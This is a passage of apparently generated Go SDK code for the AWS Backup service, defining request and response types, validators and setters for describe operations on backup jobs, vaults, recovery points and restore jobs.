func (s DescribeBackupJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeBackupJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeBackupJobInput"}
if s.BackupJobId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupJobId"))
}
if s.BackupJobId != nil && len(*s.BackupJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *DescribeBackupJobInput) SetBackupJobId(v string) *DescribeBackupJobInput {
s.BackupJobId = &v
return s
}
type DescribeBackupJobOutput struct {
_ struct{} `type:"structure"`
// Returns the account ID that owns the backup job.
AccountId *string `type:"string"`
// Uniquely identifies a request to AWS Backup to back up a resource.
BackupJobId *string `type:"string"`
// Represents the options specified as part of a backup plan or an on-demand
// backup job.
BackupOptions map[string]*string `type:"map"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// Represents the actual backup type selected for a backup job. For example,
// if a successful WindowsVSS backup was taken, BackupType returns "WindowsVSS".
// If BackupType is empty, then the backup taken was a regular backup.
BackupType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The size in bytes transferred to a backup vault at the time that the job
// status was queried.
BytesTransferred *int64 `type:"long"`
// The date and time that a backup job is completed, in Unix
// format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a backup job, including
// the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId of the
// backup plan that is used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time that a backup job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The date and time that a job to back up resources is expected to be completed,
// in Unix format and Coordinated Universal Time (UTC). The value of ExpectedCompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
ExpectedCompletionDate *time.Time `type:"timestamp"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage of the job that is complete at the time
// the job status was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a saved resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource to be backed up; for example, an Amazon Elastic
// Block Store (Amazon EBS) volume or an Amazon Relational Database Service
// (Amazon RDS) database.
ResourceType *string `type:"string"`
// Specifies the time in Unix format and Coordinated Universal Time (UTC) when
// a backup job must be started before it is canceled. The value is calculated
// by adding the start window to the scheduled time. So if the scheduled time
// is 6:00 PM and the start window is 2 hours, the StartBy time would be 8:00
// PM on the date specified. The value of StartBy is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
StartBy *time.Time `type:"timestamp"`
// The current state of a backup job.
State *string `type:"string" enum:"JobState"`
// A detailed message explaining the status of the job to back up a resource.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s DescribeBackupJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupJobOutput) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *DescribeBackupJobOutput) SetAccountId(v string) *DescribeBackupJobOutput {
s.AccountId = &v
return s
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *DescribeBackupJobOutput) SetBackupJobId(v string) *DescribeBackupJobOutput {
s.BackupJobId = &v
return s
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *DescribeBackupJobOutput) SetBackupOptions(v map[string]*string) *DescribeBackupJobOutput {
s.BackupOptions = v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *DescribeBackupJobOutput) SetBackupSizeInBytes(v int64) *DescribeBackupJobOutput {
s.BackupSizeInBytes = &v
return s
}
// SetBackupType sets the BackupType field's value.
func (s *DescribeBackupJobOutput) SetBackupType(v string) *DescribeBackupJobOutput {
s.BackupType = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *DescribeBackupJobOutput) SetBackupVaultArn(v string) *DescribeBackupJobOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeBackupJobOutput) SetBackupVaultName(v string) *DescribeBackupJobOutput {
s.BackupVaultName = &v
return s
}
// SetBytesTransferred sets the BytesTransferred field's value.
func (s *DescribeBackupJobOutput) SetBytesTransferred(v int64) *DescribeBackupJobOutput {
s.BytesTransferred = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *DescribeBackupJobOutput) SetCompletionDate(v time.Time) *DescribeBackupJobOutput {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *DescribeBackupJobOutput) SetCreatedBy(v *RecoveryPointCreator) *DescribeBackupJobOutput {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeBackupJobOutput) SetCreationDate(v time.Time) *DescribeBackupJobOutput {
s.CreationDate = &v
return s
}
// SetExpectedCompletionDate sets the ExpectedCompletionDate field's value.
func (s *DescribeBackupJobOutput) SetExpectedCompletionDate(v time.Time) *DescribeBackupJobOutput {
s.ExpectedCompletionDate = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *DescribeBackupJobOutput) SetIamRoleArn(v string) *DescribeBackupJobOutput {
s.IamRoleArn = &v
return s
}
// SetPercentDone sets the PercentDone field's value.
func (s *DescribeBackupJobOutput) SetPercentDone(v string) *DescribeBackupJobOutput {
s.PercentDone = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeBackupJobOutput) SetRecoveryPointArn(v string) *DescribeBackupJobOutput {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeBackupJobOutput) SetResourceArn(v string) *DescribeBackupJobOutput {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeBackupJobOutput) SetResourceType(v string) *DescribeBackupJobOutput {
s.ResourceType = &v
return s
}
// SetStartBy sets the StartBy field's value.
func (s *DescribeBackupJobOutput) SetStartBy(v time.Time) *DescribeBackupJobOutput {
s.StartBy = &v
return s
}
// SetState sets the State field's value.
func (s *DescribeBackupJobOutput) SetState(v string) *DescribeBackupJobOutput {
s.State = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *DescribeBackupJobOutput) SetStatusMessage(v string) *DescribeBackupJobOutput {
s.StatusMessage = &v
return s
}
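// exampleStartBy is an illustrative sketch, not part of the generated API, of
// the StartBy arithmetic documented above: the deadline is the scheduled time
// plus the start window, so a job scheduled for 6:00 PM with a two-hour
// window must start by 8:00 PM. The window length here is hypothetical.
func exampleStartBy(scheduled time.Time) time.Time {
	startWindow := 2 * time.Hour
	return scheduled.Add(startWindow)
}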
type DescribeBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeBackupVaultInput) SetBackupVaultName(v string) *DescribeBackupVaultInput {
s.BackupVaultName = &v
return s
}
type DescribeBackupVaultOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// The date and time that a backup vault is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// The number of recovery points that are stored in a backup vault.
NumberOfRecoveryPoints *int64 `type:"long"`
}
// String returns the string representation
func (s DescribeBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeBackupVaultOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *DescribeBackupVaultOutput) SetBackupVaultArn(v string) *DescribeBackupVaultOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeBackupVaultOutput) SetBackupVaultName(v string) *DescribeBackupVaultOutput {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeBackupVaultOutput) SetCreationDate(v time.Time) *DescribeBackupVaultOutput {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *DescribeBackupVaultOutput) SetCreatorRequestId(v string) *DescribeBackupVaultOutput {
s.CreatorRequestId = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *DescribeBackupVaultOutput) SetEncryptionKeyArn(v string) *DescribeBackupVaultOutput {
s.EncryptionKeyArn = &v
return s
}
// SetNumberOfRecoveryPoints sets the NumberOfRecoveryPoints field's value.
func (s *DescribeBackupVaultOutput) SetNumberOfRecoveryPoints(v int64) *DescribeBackupVaultOutput {
s.NumberOfRecoveryPoints = &v
return s
}
type DescribeCopyJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a copy job.
//
// CopyJobId is a required field
CopyJobId *string `location:"uri" locationName:"copyJobId" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeCopyJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeCopyJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeCopyJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeCopyJobInput"}
if s.CopyJobId == nil {
invalidParams.Add(request.NewErrParamRequired("CopyJobId"))
}
if s.CopyJobId != nil && len(*s.CopyJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("CopyJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetCopyJobId sets the CopyJobId field's value.
func (s *DescribeCopyJobInput) SetCopyJobId(v string) *DescribeCopyJobInput {
s.CopyJobId = &v
return s
}
type DescribeCopyJobOutput struct {
_ struct{} `type:"structure"`
// Contains detailed information about a copy job.
CopyJob *CopyJob `type:"structure"`
}
// String returns the string representation
func (s DescribeCopyJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeCopyJobOutput) GoString() string {
return s.String()
}
// SetCopyJob sets the CopyJob field's value.
func (s *DescribeCopyJobOutput) SetCopyJob(v *CopyJob) *DescribeCopyJobOutput {
s.CopyJob = v
return s
}
type DescribeGlobalSettingsInput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DescribeGlobalSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeGlobalSettingsInput) GoString() string {
return s.String()
}
type DescribeGlobalSettingsOutput struct {
_ struct{} `type:"structure"`
// A list of resources along with the opt-in preferences for the account.
GlobalSettings map[string]*string `type:"map"`
// The date and time that the global settings were last updated. This update
// is in Unix format and Coordinated Universal Time (UTC). The value of LastUpdateTime
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
LastUpdateTime *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s DescribeGlobalSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeGlobalSettingsOutput) GoString() string {
return s.String()
}
// SetGlobalSettings sets the GlobalSettings field's value.
func (s *DescribeGlobalSettingsOutput) SetGlobalSettings(v map[string]*string) *DescribeGlobalSettingsOutput {
s.GlobalSettings = v
return s
}
// SetLastUpdateTime sets the LastUpdateTime field's value.
func (s *DescribeGlobalSettingsOutput) SetLastUpdateTime(v time.Time) *DescribeGlobalSettingsOutput {
s.LastUpdateTime = &v
return s
}
type DescribeProtectedResourceInput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeProtectedResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeProtectedResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeProtectedResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeProtectedResourceInput"}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeProtectedResourceInput) SetResourceArn(v string) *DescribeProtectedResourceInput {
s.ResourceArn = &v
return s
}
type DescribeProtectedResourceOutput struct {
_ struct{} `type:"structure"`
// The date and time that a resource was last backed up, in Unix format and
// Coordinated Universal Time (UTC). The value of LastBackupTime is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
LastBackupTime *time.Time `type:"timestamp"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource saved as a recovery point; for example, an EBS volume
// or an Amazon RDS database.
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s DescribeProtectedResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeProtectedResourceOutput) GoString() string {
return s.String()
}
// SetLastBackupTime sets the LastBackupTime field's value.
func (s *DescribeProtectedResourceOutput) SetLastBackupTime(v time.Time) *DescribeProtectedResourceOutput {
s.LastBackupTime = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeProtectedResourceOutput) SetResourceArn(v string) *DescribeProtectedResourceOutput {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeProtectedResourceOutput) SetResourceType(v string) *DescribeProtectedResourceOutput {
s.ResourceType = &v
return s
}
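// lastBackupAge is an illustrative sketch, not part of the generated API,
// showing a nil-safe read of the optional LastBackupTime field: it reports
// how long ago the resource was last backed up, or false if it never was.
func lastBackupAge(out *DescribeProtectedResourceOutput, now time.Time) (time.Duration, bool) {
	if out == nil || out.LastBackupTime == nil {
		return 0, false
	}
	return now.Sub(*out.LastBackupTime), true
}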
type DescribeRecoveryPointInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeRecoveryPointInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRecoveryPointInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeRecoveryPointInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeRecoveryPointInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeRecoveryPointInput) SetBackupVaultName(v string) *DescribeRecoveryPointInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeRecoveryPointInput) SetRecoveryPointArn(v string) *DescribeRecoveryPointInput {
s.RecoveryPointArn = &v
return s
}
type DescribeRecoveryPointOutput struct {
_ struct{} `type:"structure"`
// The size, in bytes, of a backup.
BackupSizeInBytes *int64 `type:"long"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// A CalculatedLifecycle object containing DeleteAt and MoveToColdStorageAt
// timestamps.
CalculatedLifecycle *CalculatedLifecycle `type:"structure"`
// The date and time that a job to create a recovery point is completed, in
// Unix format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Contains identifying information about the creation of a recovery point,
// including the BackupPlanArn, BackupPlanId, BackupPlanVersion, and BackupRuleId
// of the backup plan used to create it.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time that a recovery point is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The server-side encryption key used to protect your backups; for example,
// arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// A Boolean value that is returned as TRUE if the specified recovery point
// is encrypted, or FALSE if the recovery point is not encrypted.
IsEncrypted *bool `type:"boolean"`
// The date and time that a recovery point was last restored, in Unix format
// and Coordinated Universal Time (UTC). The value of LastRestoreTime is accurate
// to milliseconds. For example, the value 1516925490.087 represents Friday,
// January 26, 2018 12:11:30.087 AM.
LastRestoreTime *time.Time `type:"timestamp"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups that are transitioned to cold storage must be stored in cold storage
// for a minimum of 90 days. Therefore, the “expire after days” setting
// must be 90 days greater than the “transition to cold after days” setting.
// The “transition to cold after days” setting cannot be changed after a
// backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// An ARN that uniquely identifies a saved resource. The format of the ARN depends
// on the resource type.
ResourceArn *string `type:"string"`
// The type of AWS resource to save as a recovery point; for example, an Amazon
// Elastic Block Store (Amazon EBS) volume or an Amazon Relational Database
// Service (Amazon RDS) database.
ResourceType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies the source vault where
// the resource was originally backed up; for example, arn:aws:backup:us-east-1:123456789012:vault:BackupVault.
// If the recovery point is restored to the same AWS account or Region, this
// value will be null.
SourceBackupVaultArn *string `type:"string"`
// A status code specifying the state of the recovery point.
//
// A partial status indicates that the recovery point was not successfully re-created
// and must be retried.
Status *string `type:"string" enum:"RecoveryPointStatus"`
// Specifies the storage class of the recovery point. Valid values are WARM
// or COLD.
StorageClass *string `type:"string" enum:"StorageClass"`
}
// String returns the string representation
func (s DescribeRecoveryPointOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRecoveryPointOutput) GoString() string {
return s.String()
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *DescribeRecoveryPointOutput) SetBackupSizeInBytes(v int64) *DescribeRecoveryPointOutput {
s.BackupSizeInBytes = &v
return s
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *DescribeRecoveryPointOutput) SetBackupVaultArn(v string) *DescribeRecoveryPointOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DescribeRecoveryPointOutput) SetBackupVaultName(v string) *DescribeRecoveryPointOutput {
s.BackupVaultName = &v
return s
}
// SetCalculatedLifecycle sets the CalculatedLifecycle field's value.
func (s *DescribeRecoveryPointOutput) SetCalculatedLifecycle(v *CalculatedLifecycle) *DescribeRecoveryPointOutput {
s.CalculatedLifecycle = v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *DescribeRecoveryPointOutput) SetCompletionDate(v time.Time) *DescribeRecoveryPointOutput {
s.CompletionDate = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *DescribeRecoveryPointOutput) SetCreatedBy(v *RecoveryPointCreator) *DescribeRecoveryPointOutput {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *DescribeRecoveryPointOutput) SetCreationDate(v time.Time) *DescribeRecoveryPointOutput {
s.CreationDate = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *DescribeRecoveryPointOutput) SetEncryptionKeyArn(v string) *DescribeRecoveryPointOutput {
s.EncryptionKeyArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *DescribeRecoveryPointOutput) SetIamRoleArn(v string) *DescribeRecoveryPointOutput {
s.IamRoleArn = &v
return s
}
// SetIsEncrypted sets the IsEncrypted field's value.
func (s *DescribeRecoveryPointOutput) SetIsEncrypted(v bool) *DescribeRecoveryPointOutput {
s.IsEncrypted = &v
return s
}
// SetLastRestoreTime sets the LastRestoreTime field's value.
func (s *DescribeRecoveryPointOutput) SetLastRestoreTime(v time.Time) *DescribeRecoveryPointOutput {
s.LastRestoreTime = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *DescribeRecoveryPointOutput) SetLifecycle(v *Lifecycle) *DescribeRecoveryPointOutput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DescribeRecoveryPointOutput) SetRecoveryPointArn(v string) *DescribeRecoveryPointOutput {
s.RecoveryPointArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *DescribeRecoveryPointOutput) SetResourceArn(v string) *DescribeRecoveryPointOutput {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *DescribeRecoveryPointOutput) SetResourceType(v string) *DescribeRecoveryPointOutput {
s.ResourceType = &v
return s
}
// SetSourceBackupVaultArn sets the SourceBackupVaultArn field's value.
func (s *DescribeRecoveryPointOutput) SetSourceBackupVaultArn(v string) *DescribeRecoveryPointOutput {
s.SourceBackupVaultArn = &v
return s
}
// SetStatus sets the Status field's value.
func (s *DescribeRecoveryPointOutput) SetStatus(v string) *DescribeRecoveryPointOutput {
s.Status = &v
return s
}
// SetStorageClass sets the StorageClass field's value.
func (s *DescribeRecoveryPointOutput) SetStorageClass(v string) *DescribeRecoveryPointOutput {
s.StorageClass = &v
return s
}
type DescribeRegionSettingsInput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DescribeRegionSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRegionSettingsInput) GoString() string {
return s.String()
}
type DescribeRegionSettingsOutput struct {
_ struct{} `type:"structure"`
// Returns a list of all services along with the opt-in preferences in the Region.
ResourceTypeOptInPreference map[string]*bool `type:"map"`
}
// String returns the string representation
func (s DescribeRegionSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRegionSettingsOutput) GoString() string {
return s.String()
}
// SetResourceTypeOptInPreference sets the ResourceTypeOptInPreference field's value.
func (s *DescribeRegionSettingsOutput) SetResourceTypeOptInPreference(v map[string]*bool) *DescribeRegionSettingsOutput {
s.ResourceTypeOptInPreference = v
return s
}
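// exampleDescribeRegionSettings is a usage sketch, not generated API code. It
// shows how the opt-in map returned by DescribeRegionSettings is typically
// read: keys name resource types and values carry the opt-in preference for
// the Region. The client value svc is an assumption for illustration.
func exampleDescribeRegionSettings(svc *Backup) error {
	out, err := svc.DescribeRegionSettings(&DescribeRegionSettingsInput{})
	if err != nil {
		return err
	}
	for resourceType, optedIn := range out.ResourceTypeOptInPreference {
		// Values are *bool; aws.BoolValue treats a nil pointer as false.
		fmt.Printf("%s opted in: %t\n", resourceType, aws.BoolValue(optedIn))
	}
	return nil
}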
type DescribeRestoreJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies the job that restores a recovery point.
//
// RestoreJobId is a required field
RestoreJobId *string `location:"uri" locationName:"restoreJobId" type:"string" required:"true"`
}
// String returns the string representation
func (s DescribeRestoreJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DescribeRestoreJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DescribeRestoreJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DescribeRestoreJobInput"}
if s.RestoreJobId == nil {
invalidParams.Add(request.NewErrParamRequired("RestoreJobId"))
}
if s.RestoreJobId != nil && len(*s.RestoreJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RestoreJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetRestoreJobId sets the RestoreJobId field's value.
func (s *DescribeRestoreJobInput) SetRestoreJobId(v string) *DescribeRestoreJobInput {
s.RestoreJobId = &v
return s
}
type DescribeRestoreJobOutput struct {
_ struct{} `type:"structure"`
// Returns the account ID that owns the restore job.
AccountId *string `type:"string"`
// The size, in bytes, of the restored resource.
BackupSizeInBytes *int64 `type:"long"`
// The date and time that a job to restore a recovery point is completed, in
// Unix format and Coordinated Universal Time (UTC). The value of CompletionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource whose recovery
// point is being restored. The format of the ARN depends on the resource type
// of the backed-up resource.
CreatedResourceArn *string `type:"string"`
// The date and time that a restore job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// The amount of time in minutes that a job restoring a recovery point is expected
// to take.
ExpectedCompletionTimeMinutes *int64 `type:"long"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Contains an estimated percentage complete of a job at the time the job
// status was queried.
PercentDone *string `type:"string"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
// Returns metadata associated with a restore job listed by resource type.
ResourceType *string `type:"string"`
// Uniquely identifies the job that restores a recovery point.
RestoreJobId *string `type:"string"`
// Status code specifying the state of the job that is initiated by AWS Backup
// to restore a recovery point.
Status *string `type:"string" enum:"RestoreJobStatus"`
// A message showing the status of a job to restore a recovery point.
